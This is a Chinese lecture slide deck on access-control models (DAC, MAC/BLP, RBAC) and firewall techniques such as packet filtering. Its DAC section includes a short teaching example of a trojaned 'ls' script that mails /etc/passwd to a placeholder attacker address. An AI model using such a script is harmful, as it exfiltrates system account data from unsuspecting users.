当前位置:文档之家 › 访问控制原理与防火墙技术

访问控制原理与防火墙技术

  • 格式:ppt
  • 大小:877.50 KB
  • 文档页数:57

下载文档原格式

  / 57

合集下载

访问控制防火墙可以根据配置的安全策略对网络流量进行访问控制阻止未经授权的访问

访问控制防火墙可以根据配置的安全策略对网络流量进行访问控制阻止未经授权的访问

访问控制防火墙可以根据配置的安全策略对网络流量进行访问控制阻止未经授权的访问网络安全是当今社会的一个重要议题,随着互联网的迅速发展和信息技术的进步,对于网络的安全保护也变得尤为重要。

访问控制防火墙(Access Control Firewall)作为一种常见的网络安全设备,扮演着网络安全中的重要角色。

本文将介绍访问控制防火墙的概念、工作原理以及其对网络流量的访问控制能力。

一、访问控制防火墙的概念访问控制防火墙是一种位于网络边界的安全设备,主要用于监控和控制网络流量,防止非授权用户或未经授权的设备访问网络。

其功能包括筛选数据包、监控网络连接、配置安全策略等。

通过建立一条可信任的通信通道,并根据预先设定的安全策略来限制或允许特定类型的流量通过,访问控制防火墙有效地增强了网络的安全性。

二、访问控制防火墙的工作原理访问控制防火墙通过以下几个步骤来实现对网络流量的访问控制:1. 数据包过滤:防火墙会对通过网络进入或离开的数据包进行筛选,根据预设的规则决定是否允许通过。

数据包筛选可以基于源IP地址、目标IP地址、端口号、传输协议等信息进行。

2. 防火墙连接跟踪:防火墙会监控网络连接的状态,并根据事先设定的安全策略来管理连接。

通过跟踪连接状态,防火墙可以检测到潜在的安全威胁,如入侵尝试或异常连接行为,并采取相应的措施进行阻止或记录。

3. 安全策略的应用:访问控制防火墙根据管理员设定的安全策略来决定网络流量的访问权限。

安全策略可以包括允许特定的服务或应用通过,禁止某些协议或端口的使用,以及限制特定用户或IP地址的访问等。

通过灵活配置安全策略,访问控制防火墙可以根据实际需求进行强大的访问控制,保护网络的安全。

三、访问控制防火墙的访问控制能力访问控制防火墙的访问控制能力是指其对网络流量进行控制和阻止未经授权的访问的能力。

1. 防止未经授权的访问:访问控制防火墙可以通过禁止特定IP地址、端口号或协议的使用,防止未经授权的访问。

学校校园网络安全管理中的防火墙技术应用

学校校园网络安全管理中的防火墙技术应用

学校校园网络安全管理中的防火墙技术应用随着信息技术的发展,学校校园内的网络已经成为了学生学习和教师教育的重要工具。

然而,学校校园网络的使用也存在着一些安全风险,例如网络攻击、非法访问、病毒感染等。

为了保障校园网络的安全,学校需要采取一系列措施。

其中,防火墙技术应用是学校校园网络安全管理的关键之一。

本文将介绍防火墙技术在学校校园网络安全管理中的应用。

一、防火墙的概念和原理防火墙是一种位于网络边界的安全设备,它通过对网络数据进行过滤和监控,阻止未经授权的访问和恶意攻击。

防火墙采用了一系列的安全规则和策略,根据网络数据包的源地址、目标地址、端口等信息进行判断和处理,有效保护了网络的安全。

防火墙的原理主要包括包过滤、访问控制列表(ACL)、网络地址转换(NAT)等技术。

包过滤是防火墙最基本的功能,它通过检查数据包的源地址、目标地址、端口等信息,决定是否允许通过。

ACL是防火墙中的一种规则集合,用于限制访问权限,可根据需求设置不同的ACL规则。

NAT技术可以将内部网络的私有IP地址转换为公共IP 地址,提高了网络的安全性。

二、学校校园网络中的安全挑战在学校校园网络中,存在着一些安全挑战,如下所示:1. 未经授权的访问:学生或外部人员可能试图通过非法手段进入学校校园网络,获取未被授权的权限,这会对网络安全造成威胁。

2. 病毒和恶意软件:学校校园网络中的计算机容易受到病毒、蠕虫和恶意软件的感染,这些恶意代码可能会导致网络故障、数据丢失等问题。

3. 网络攻击:黑客可能通过网络攻击手段,如拒绝服务攻击(DDoS)、SQL注入、跨站脚本攻击等,对学校校园网络进行破坏和入侵。

三、防火墙技术在学校校园网络中的应用为了应对学校校园网络中的安全挑战,防火墙技术被广泛应用于网络安全管理中。

下面将介绍防火墙技术在学校校园网络中的具体应用。

1. 访问控制:防火墙可以通过设置访问控制列表(ACL)来限制访问权限,仅允许经过授权的用户访问学校校园网络。

防火墙工作原理

防火墙工作原理

防火墙工作原理
防火墙是一种网络安全设备,用于保护计算机网络不受非法访问和恶意攻击。

它的工作原理主要有以下几个方面:
1. 访问控制:防火墙通过检查传入和传出网络数据包的源地址、目的地址、协议和端口号等信息,根据事先设定的规则来决定是否允许通过。

只有满足规则的数据包才能通过防火墙,而不符合规则的数据包将被阻止。

这样可以有效地控制网络流量,防止未经授权的访问和入侵。

2. 网络地址转换(NAT):防火墙可以在内部网络和外部网
络之间进行网络地址转换,将内部私有IP地址和外部公共IP
地址进行映射。

这样可以隐藏内部网络的真实IP地址,增加
网络安全性,同时可以解决IP地址不足的问题。

3. 数据包过滤:防火墙可以根据网络数据包的内容进行过滤和检测,通过比对数据包与已知的恶意代码、病毒特征、攻击签名等进行匹配,从而实现实时监测和阻止潜在的网络攻击。

4. 网络代理:防火墙可以作为网络代理,代替内部网络与外部网络进行通信。

这样可以隐藏内部网络的真实结构和拓扑,提高网络安全性。

同时,通过代理服务器可以对网络数据进行深层次的检查和过滤,加强安全防护。

5. 虚拟专用网络(VPN)支持:防火墙可以提供VPN功能,
允许远程用户通过Internet安全地访问内部网络。

它可以对远
程用户进行身份认证,并通过加密和隧道技术实现数据的安全
传输。

总之,防火墙通过访问控制、网络地址转换、数据包过滤、网络代理和VPN支持等技术手段,保护计算机网络免受未授权的访问和恶意攻击,维护网络的安全和稳定运行。

网络安全理论与技术

网络安全理论与技术

网络安全理论与技术网络安全是指为了保护网络系统、网络数据和网络用户而采取的一系列理论和技术措施。

在网络安全的实施过程中,有许多理论和技术被广泛应用。

本文将介绍几种常见的网络安全理论和技术,并分析它们的原理和应用场景。

一、访问控制理论与技术访问控制是网络安全的基础之一,它通过对用户和系统之间的交互进行限制和验证,确保只有合法用户能够访问系统资源。

访问控制技术包括身份验证、授权和审计等。

例如,常见的身份验证方法包括密码、指纹和智能卡等,授权技术可以通过角色或访问策略来限制用户的权限,审计技术可以追踪和记录用户的操作行为。

二、加密与解密理论与技术加密与解密是保障网络数据安全的重要手段。

加密技术通过使用密钥对数据进行转换,使其变得不可读,只有持有正确密钥的人才能够解密。

常见的加密算法包括对称加密算法和非对称加密算法。

对称加密算法使用相同的密钥进行加密和解密,速度较快但不利于密钥管理;非对称加密算法使用公钥进行加密,私钥进行解密,安全性较高但速度较慢。

三、防火墙理论与技术防火墙是一种用于保护网络系统的安全设备,它通过检测和过滤网络流量,控制网络中的数据传输。

防火墙可以分为网络层防火墙和应用层防火墙。

网络层防火墙基于网络地址和端口进行过滤,应用层防火墙可以检测和控制应用层协议的数据流。

防火墙技术可以有效防止未经授权的网络访问和攻击。

四、入侵检测与防御理论与技术入侵检测与防御是网络安全的重要环节,它可以监测和识别网络中的入侵行为,及时采取措施进行防御。

入侵检测技术包括基于特征的检测和基于行为的检测。

基于特征的检测通过识别已知的入侵特征来进行检测,基于行为的检测通过分析用户和系统的行为来进行检测。

入侵防御技术包括网络隔离、入侵防护设备和安全策略等。

五、恶意代码分析与防护理论与技术恶意代码是指针对计算机系统和网络进行攻击和破坏的恶意软件,如病毒、蠕虫和木马等。

恶意代码分析与防护技术可以对恶意代码进行检测、分析和防御。

防火墙技术原理(1、2)(学习笔记)

防火墙技术原理(1、2)(学习笔记)

讲师:防火墙技术原理刘鸿霞内容:1、防火墙技术原理2、访问控制及访问控制列表3、一、防火墙技术原理1、防火墙概要介绍2、防火墙功能及原理3、防火墙典型应用4、防火墙存在的问题二、防火墙的定义防火墙:一种高级访问控制设备,置于不同网络安全域之间,它通过相关的安全策略来控制(允许、拒绝、监视、记录)进出网络的访问行为。

三、防火墙的核心技术1、包过滤:最常用的技术。

工作在网络层,根据数据包头中的IP、端口、协议等确定是否数据包通过2、应用代理:另一种主要技术,工作在第7层应用层,通过编写应用代理程序,实现对应用层数据的检测和分析3、状态检测:工作在2-4层,控制方式与1同,处理的对象不是单个数据包,而是整个连接,通过规则表(管理人员和网络使用人员事先设定好的)和连接状态表,综合判断是否允许数据包通过。

4、完全内容检测:需要很强的性能支撑,既有包过滤功能、也有应用代理的功能。

工作在2-7层,不仅分析数据包头信息、状态信息,而且对应用层协议进行还原和内容分析,有效防范混合型安全威胁。

四、包过滤防火墙技术原理1、简单包过滤防火墙不检查数据区2、简单包过滤防火墙不建立连接状态表3、前后报文无关4、应用层控制很弱五、应用代理防火墙技术原理1、不检查IP\TCP报头2、不建立连接状态表3、网络层保护比较弱六、状态检测防火墙技术原理1、不检查数据区2、建立连接状态表3、前后报文相关4、应用层控制很弱七、完全内容检测防火墙技术原理1、网络层保护强2、应用层保护强3、会话保护很强4、上下文相关5、前后报文有联系八、防火墙体系结构1、过滤路由器2、多宿主主机3、被屏蔽主机4、被屏蔽子网九、过滤路由器(Filtering Router)1、过滤路由器作为内外网连接的唯一通道,通过ACL策略要求所有的报文都必须在此通过检查,实现报文过滤功能2、它的缺点是一旦被攻陷后很难发现,而且不能识别不同的用户(没有日志记录)。

十、双宿主主机(Dual Homed Gateway)1、双宿主主机优于过滤路由器的地方是:堡垒主机的系统软件可用于维护系统日志2、它的致使弱点是:一旦入侵者侵入堡垒主机,则无法保证内部网络的安全。

数据安全保护技术之访问控制技术

数据安全保护技术之访问控制技术

数据安全保护技术之访问控制技术简介访问控制技术是数据安全保护的基础之一,它是指通过对用户、程序或系统资源的访问进行授权并对未授权访问进行拒绝,从而控制对计算机系统中各种资源的访问。

访问控制技术可以避免一些不必要的麻烦和损失,例如:数据泄漏、非法入侵、破坏等。

在数据安全保护中扮演着至关重要的角色。

访问控制技术的原理访问控制技术是根据计算机系统中的各种资源和访问者进行授权和拒绝访问其资源的技术,其优点是可以避免非法的访问,保护计算机系统的信息安全。

访问控制技术的实现主要有以下几种方式:基于身份验证的访问控制基于身份验证的访问控制是指在控制对计算机资源的访问时对用户身份进行验证,只有通过身份验证后才能访问该资源,否则将无法访问。

身份验证主要分为以下几种:•口令验证:需要用户输入登录口令验证身份,也叫密码验证。

•物理证明:指需要用户提供物理介质如智能卡、指纹等进行身份验证。

•数字证书:使用数字证书对用户进行身份验证。

数字证书是指由可信的证书颁发机构颁发的,用于证明用户身份的电子证书。

基于身份验证的访问控制虽然保障了用户身份的可靠性和安全性,但也有其不足之处。

比如,如果口令管理不当,可能会被猜测到,信息泄露风险就会大大增加。

基于访问策略的访问控制基于访问策略的访问控制是通过在计算机系统中实现访问控制方式来确保不同用户或程序对计算机资源访问的允许或拒绝。

访问策略通常包括以下几种方式:•强制访问控制(MAC):是一种基于安全标记的访问控制方式。

该策略是根据一个标记来确定某个主体是否有权访问一个对象或资源。

•自主访问控制(DAC):是一种基于主体或所有者的访问控制方式。

该策略是根据所有者定义的策略来确定某个主体是否有权访问一个对象或资源。

•角色访问控制(RBAC):是一种基于角色的访问控制方式。

该策略是根据主体所配置的角色来控制访问该资源的权限。

•操作访问控制(OAC):是一种基于操作的访问控制方式。

该策略是根据主体被授权执行的操作来控制访问该资源的权限。

浅析防火墙技术毕业论文

浅析防火墙技术毕业论文防火墙技术是网络安全中非常重要的一种技术手段,主要用于保护网络系统免受外部攻击和威胁。

本文将从防火墙技术的定义、工作原理、分类和应用等方面进行浅析。

一、防火墙技术的定义防火墙技术是指在网络中设置一道或多道屏障,对网络流量进行监控和过滤,以达到保护网络系统安全的目的。

防火墙可以对进出网络的数据包进行检查和过滤,根据预设的规则对特定的数据包进行允许或阻止的处理。

二、防火墙技术的工作原理防火墙通过对网络流量的监控和过滤,实现对网络通信的控制。

其工作原理主要包括以下几个步骤:1.数据包检查:防火墙对进出网络的数据包进行检查,包括源IP地址、目的IP地址、端口号等信息。

可以通过对数据包的源和目的地址进行比对,来判断数据包的合法性。

3.规则匹配:防火墙根据预设的规则,对数据包进行匹配。

根据规则的设定,防火墙可以允许某些特定的数据包通过,也可以阻止部分数据包的传输。

4.日志记录:防火墙对通过和阻止的数据包进行记录,以便后期的审计和追踪。

可以通过日志记录进行安全事件的分析和溯源。

5.远程管理:防火墙可以支持远程管理,通过设置远程访问权限,管理员可以远程登录防火墙,并对其配置和管理。

6.漏洞扫描:防火墙可以对网络系统进行漏洞扫描,及时发现系统中存在的安全漏洞,并采取相应的措施进行修复和防范。

三、防火墙技术的分类根据不同的防护对象和工作方式,防火墙技术可以分为以下几种:1.包过滤防火墙:根据数据包的源IP地址、目的IP地址、端口号等信息进行过滤和判断,对数据包进行允许或阻止的处理。

2.状态检测防火墙:通过对数据包进行状态检测和跟踪,对疑似攻击的数据包进行拦截和阻止。

3.应用层网关防火墙:在传输层和应用层之间,对数据包进行深层次的分析和筛选,对数据包进行重组和改写。

4.代理防火墙:作为客户端和服务器之间的中间人,代理防火墙接收客户端的请求,并代表客户端向服务器发送请求,并根据预设的规则对请求和响应进行筛选和处理。

访问控制技术的原理及应用

访问控制技术的原理及应用1. 引言访问控制技术是信息安全领域中的重要组成部分,它可以确保只有授权用户能够获取特定的系统资源或信息。

本文将介绍访问控制技术的原理及其在实际应用中的重要性。

2. 访问控制技术的原理访问控制技术的原理主要分为以下几个方面:2.1 认证认证是访问控制技术中的第一步,它的目的是验证用户的身份或权限。

常用的认证方式包括用户名密码认证、数字证书认证、生物特征认证等。

认证成功后,系统将会为用户分配一个特定的身份。

2.2 授权授权是访问控制技术中的第二步,它用于授予用户对特定资源或信息的访问权限。

授权的方式可以是基于角色的访问控制,也可以是基于属性的访问控制。

系统管理员可以根据用户的身份和权限设置相应的访问策略。

2.3 审计审计是访问控制技术中的重要环节,它可以对系统中的活动进行监控和记录。

通过审计,系统管理员可以追踪用户的操作行为,发现潜在的安全威胁和漏洞,并及时采取相应的措施进行防护。

2.4 加密加密是访问控制技术中的另一个重要组成部分,它可以保护数据的机密性和完整性,防止未经授权的访问者获取敏感信息。

常见的加密方式包括对称加密和非对称加密。

加密技术可以和认证、授权等访问控制技术相结合,形成一个更加安全的系统。

3. 访问控制技术的应用3.1 企业内部网络在企业内部网络中,访问控制技术可以确保只有员工能够访问公司的内部资源,保护公司的商业机密和敏感信息。

通过认证和授权,系统管理员可以灵活地对员工的访问权限进行管理,并随时对系统进行审计,确保安全性。

3.2 云计算平台在云计算平台中,访问控制技术可以确保只有授权用户能够访问云上的资源。

通过认证和授权,云服务提供商可以对不同用户的访问权限进行细粒度的控制。

同时,对云上的活动进行审计可以及时发现并应对潜在的安全威胁。

3.3 物理门禁系统访问控制技术在物理门禁系统中也有广泛的应用。

通过将访问控制卡与用户身份进行绑定,系统管理员可以对不同用户设置不同的门禁权限。

防火墙的四种基本技术

防火墙的四种基本技术
1. 访问控制技术:访问控制技术是一种以安全性为基础的技术,可以控制网络中网络访问权限,控制用户可以访问哪些网络服务,以及哪些用户可以访问当前的网络。

访问控制的原理是认证和授权,基于主机的网络访问控制安全技术是在网络边界对主机进行识别和控制,以确保访问网络服务时不被恶意攻击性服务损害,而且可以根接受特定用户的访问。

2. 数据包过滤技术:数据包过滤技术是指根据来源和目的地的地址,端口,协议,以及数据类型等标准,在防火墙上对数据包进行过滤和处理。

过滤可以针对特定的协议和端口限制数据的流量,从而防止某些特殊的攻击。

数据包过滤技术可以按照特定的规则过滤外部流量,有效地防止一些未经授权的网络服务攻击。

3. 端口转发技术:端口转发技术是把外部网络上来的请求,转发到内部网络上的一种技术。

端口转发可以把外部客户访问的内部系统的请求转发到内部的安全出口,从而保证内部的网络安全性。

当内部客户请求服务器处理时,可以使用端口转发技术,将请求转发到内部服务器,并以正确的方式返回外部客户。

4. 虚拟专用网络技术:虚拟专用网络技术是一种利用公共网络资源,构建一组连接,使不同网络中的两个或多个用户设备像连接到同一私
有网络中一样进行通信的技术。

通过虚拟网络通道,可以实现专用网络的性能和安全性,保护数据不被外部未经授权的访问,有效地保护内部网络安全性,有效地保护内部网络数据安全。

第3章访问控制与防火墙技术


动作 拒绝

内部网络
拒绝
缺点:信息利用不完全。
3.2 防火墙技术基础
按服务过滤: 例:禁 止外部 主 机访问 内 部的 E_Mail 服务器 ( 协议 SMTP 端口25),允许内部主机访问外部主机,则:
规则 方向 A B C 入 出 双向 动作 拒绝 允许 拒绝 源 地址 M * * 源端口 * * * 目的地址 E_Mail * * 目的 端口 25 * * 注释 不信任 允许连接 默认状态

路由协议本身具有安全漏洞 路由器上的分组过滤规则的设置和配置复杂 攻击者可假冒地址 本质缺陷:一对矛盾,防火墙的设置会大大降低 路由器的性能。

路由器:为网络访问提供动态灵活的路由 防火墙:对访问行为实施静态固定的控制
3.2 防火墙技术基础
包过滤型防火墙
第二代: 用户化的防火墙工具套件
3.1 访问控制技术
•强制访问控制(mandatory policies)
特点:取决于能用算法表达的并能在计算机上执行的策
略。策略给出资源受到的限制和实体的授权,对资源的 访问取决于实体的授权而非实体的身份。RBAC决策在批 准一个访问之前需要进行授权信息和限制信息的比较。
(1)将主体和客体分级,根据主体和客体的级别标记来
安全策略之间没有更好的说法,只是一种可以比一种
提供更多的保护。应根据应用环境灵活使用。
3.1 访问控制技术
访问控制策略与机制
•自主访问控制(discretionary policies), 也称基 于身份的访问控制IBAC(Identity Based Access Control) •强制访问控制(mandatory policies),也称基于规则 的访问控制RBAC(Rule Based Access Control) •基于角色的访问控制(role-based policies)
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

20
强制型访问控制(MAC)
• Mandatory Access Control • 每个主体和客体分配一个固定的安全级别, 只有系统管理员才可以修改
– Clearance ,classification , sensitivity – Unclassified< confidential< secret< top secret – 普密<秘密<机密<绝密
30
关于防火墙的争论
• 防火墙破坏了Internet端到端的特性,阻碍 了新的应用的发展 • 防火墙没有解决主要的安全问题,即网络 内部的安全问题 • 防火墙给人一种误解,降低了人们对主机 安全的意识
31
主要内容
• • • • 5.2.1 防火墙的 基本概念 5.2.2 防火墙的几种技术 5.2.3 防火墙的配置结构 5.2.4 防火墙的设计
• 优点
– – – – 可以保护所有的服务 对应用透明 较高的网络性能 成本较低
• 缺点
– 无法实施细粒度的访 问控制政策 – 现有的工具不完善 – 规则配置复杂 – 降低路由器的性能
35
电路层网关(Circuit Gateway)
• 工作在传输层/会话层
– 根据数据包的标志位建立一个连接状态表 – 对于收到的某个IP包,检查它是否属于某一个会话? – 跟踪一段时间内一个会话中经过包的总数
R/W
R R R
W
R/W R R S
W
W R/W R C 信息流向
W
W W R/W U
TS
S C U
Subjects
TS
23
基于角色的访问控制(RBAC)
• 用户组(group)
– 用户组:用户的集合 G={s1, s2, s3 …} – 授权管理:把用户分组,把访问权限分配给一个用户 组;
• 角色(Role)
28
防火墙可以做什么
• 防火墙可以在网络边界实施访问控制政策 • 防火墙可以记录所有的访问 • 防火墙可以隐藏内部网络
29
防火墙不可以做什么
• 防火墙自身不会正确的配置,需要用户定 义访问控制规则 • 防火墙不能防止内部恶意的攻击者 • 防火墙无法控制没有经过它的连接 • 防火墙无法防范全新的威胁和攻击 • 防火墙不能很好的实现防病毒
2A
a00 a M 10 ... am 0
a01 a11 ... am1
... a0 n ... a1n ... ... ... amn
的操作。比如 a { R , W }, a ij lk
对于任意 s S , o O , 存在 a M 决定 s 对 o 允许 i j ij i j
25
6.2 防火墙技术
26
主要内容
• • • • 6.2.1 防火墙的 基本概念 6.2.2 防火墙的几种技术 6.2.3 防火墙的配置结构 6.2.4 防火墙的设计
27
防火墙的基本概念
• 防火墙是在两个网络(通常是用户内部网络和 Internet)之间实施访问控制政策的一个或一组系 统(硬件、软件的组合) • 所有进入和离开的数据都必须经过防火墙的检查, 只有符合访问控制政策的数据才允许通过
32
防火墙技术
• • • • 包过滤技术(Packet filtering/screening) 电路层网关(Socks) 应用层代理(Proxy) 地址转换(NAT)
应用层代理 电路层网关 内部网络 包过滤、地址转换 链路层 物理层
33
外部网络
包过滤技术(Packet filtering)
• 工作在网络层,称为Packet filter, screen router • 基于以下信息对经过的每一个包进行检查:
9
访问控制矩阵
a 00 a M 10 ... a m 0 a 01 a 11 ... a m 1 ... a S 0 n 1 ... a S 1 n 2 O 1 O 2 ... O n ... ... ... ... a S mn m
• 只有在主体和客体的安全级别满足一定规 则时,才允许访问
21
强制型访问控制(续)
• BLP 模型
– 禁止向下写:
如果用户的级别比要写 的客体级别高,则该 操作是不允许的
– 禁止向上读:
• 如果主体的级别比要 读的客体级别低,则 该操作是不允许的。
22
强制型访问控制(续)
BLP 模型的信息流
Objects
12
访问控制表(Windows)
13
访问控制与其他安全机制的关系
• 认证、授权、审计(AAA)
授权(authorization)
授权信息
身份认证 主体
访问控制 客体
审计
Log
14
访问控制与其他安全机制的关系
• 身分认证
– 身份认证是访问控制的前提
• 保密性
– 限制用户对数据的访问(读取操作)可以实现数据保 密服务
– 角色是完成一项任务必须访问的资源及相应操作权限 的集合,R={(a1,o1), (a2,o2), (a3,o3)…} – 授权管理:
• 根据任务需要定义角色, • 为角色分配资源和操作权限 • 给一个用户指定一个角色
24
基于角色的访问控制(RBAC)
• 角色的继承关系
Project Supervisor
第六讲、访问控制原理与防火墙技术
1
6.1 访问控制原理
2
主要内容
• 6.1.1 访问控制的基本概念 • 6.1.2 基本的访问控制政策模型
3
访问控制的基本概念
• 什么是访问控制 • 访问控制的基本模型 • 访问控制和其他安全机制的关系
4
访问控制的基本概念
• 主体(Subject)
– 主体是一个主动的实体,它提出对资源访问请求。 如用户,程序,进程等。
– – – – – IP 源地址和目标地址 协议 (TCP, UDP,ICMP, BGP等) TCP/UDP源端口号和目标端口号 ICMP的消息类型 包的大小
• 常见包过滤设备/软件
– 路由器访问控制表ACL – 硬件包过滤设备 – 软件:ipchains / netfilter
34
包过滤技术(Packet filtering)
• 访问控制功能的实施
– 控制实施部件如何获得实体的访问控制信息 – 怎样执行
8
访问控制矩阵
• 访问控制机制可以用一个三元组来表示(S,O,M)
– 主体的集合 S={s1,s2,…,sm} – 客体的集合 O={o1,o2,…,on} – 所有操作的集合 A={R, W, E,…} – 访问控制矩阵 M= S × O
访问控制决策功能 (ADF)
访问控制政策规则
上下文信息(如时间,地址等)
7
访问控制的基本概念
• 访问控制信息(ACI)的表示
– 主体访问控制属性 – 客体访问控制属性 – 访问控制政策规则
• 授权(Authorization)
– 怎样把访问控制属性信息分配给主体或客体 – 如何浏览、修改、回收访问控制权限
– 主体,发起者 : Subject,Initiator – 客体,目标 : Object, Target – 访问操作 : Access
Read/Write/Exec
Object
6
访问控制模型
访问请求
访问控制执行功能 提交访问 (AEF)
决策请求 决策
客体的访问 控制信息
客体
主体
主体的访问 控制信息
特洛伊木马举例: #cat > /tmp/ls mail hacker@ < /etc/passwd /bin/ls Ctrl+D # chmod a+x /tmp/ls 如果用户的路径设置不安全,如path= ./:/usr/bin:/usr/sbin:/usr/local/bin # cd /tmp # ls
17
自主型访问控制政策
• Discretionary Access Control , DAC • 每个客体有一个属主,属主可以按照自己的 意愿把客体的访问控制权限授予其他主体 • DAC是一种分布式授权管理的模式 • 控制灵活,易于管理,是目前应用最为普遍 的访问控制政策
18
自主型访问控制政策
19
自主型访问控制(DAC)
• 无法控制信息流动
– 信息在移动过程中其访问权限关系会被改变。如用户 A可将其对目标O的访问权限传递给用户B, 从而使不 具备对O访问权限的B可访问O。
• 特洛伊木马的威胁
– 特洛伊木马(Trojan)是一段计算机程序,它附在合 法程序的中,执行一些非法操作而不被用户发现
• 客体(Object )
– 含有被访问资源的被动实体,如网络、计算机、 数据库、文件、目录、计算机程序、 外设、网络。
• 访问(Access)
– 对资源的使用,读、写、修改、删除等操作, 例如访问存储器;访问文件、目录、外设;访 问数据库;访问一个网站。
5
访问控制的基本概念
• 访问可以被描述为一个三元组 (s, a, o)
Oct 18 15:16 4011.tmp Oct 28 11:41 ls Aug 29 09:04 mysql.sock Oct 23 23:41 ssl
Oct 18 15:16 4011.tmp Oct 28 11:41 ls Aug 29 09:04 mysql.sock Oct 23 23:41 ssl
• 完整性
– 限制用户对数据的修改,实现数据完整性保护
• 可用性
– 限制用户对资源的使用量,保证系统的可用性